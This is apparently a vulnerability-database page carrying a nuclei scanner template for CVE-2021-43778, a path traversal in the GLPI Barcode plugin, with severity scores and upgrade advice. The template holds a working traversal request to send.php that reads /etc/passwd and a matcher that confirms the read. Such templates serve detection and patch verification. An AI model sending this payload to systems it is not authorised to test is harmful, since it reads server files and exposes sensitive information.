Lucene search
K

GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 63 Views

GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability impacting GLPI instances version 2.x. Allows unauthorized access by reading arbitrary files. Remediation includes upgrading to version 2.6.1 or later or deleting `front/send.php` file

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Glpi-Project Barcode
30 Nov 202108:19
githubexploit
Circl
CVE-2021-43778
24 Nov 202122:27
circl
CNNVD
GLPI 路径遍历漏洞
24 Nov 202100:00
cnnvd
CVE
CVE-2021-43778
24 Nov 202118:50
cve
Cvelist
CVE-2021-43778 Path traversal in GLPI barcode plugin
24 Nov 202118:50
cvelist
NVD
CVE-2021-43778
24 Nov 202119:15
nvd
OSV
CVE-2021-43778
24 Nov 202119:15
osv
Prion
Path traversal
24 Nov 202119:15
prion
Positive Technologies
PT-2021-23927
24 Nov 202100:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2021-43778
31 May 202200:00
vulncheck_kev
Rows per page
id: CVE-2021-43778

info:
  name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
  author: cckuailong
  severity: high
  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
  reference:
    - https://github.com/AK-blank/CVE-2021-43778
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
    - https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9
    - https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1
    - https://github.com/pluginsGLPI/barcode/commit/428c3d9adfb446e8492b1c2b7affb3d34072ff46
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43778
    cwe-id: CWE-22
    epss-score: 0.52658
    epss-percentile: 0.98838
    cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: glpi-project
    product: barcode
  tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ec2501b0f33f53fc23dd15ef63b4c87e92b811e2899a7dbeea00b6be5414ac9602210082adefde5a6cdd58db1a54740725424d2cd59931efd89c1bba70be7d4affb05b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5 - 9.1
EPSS0.52658
63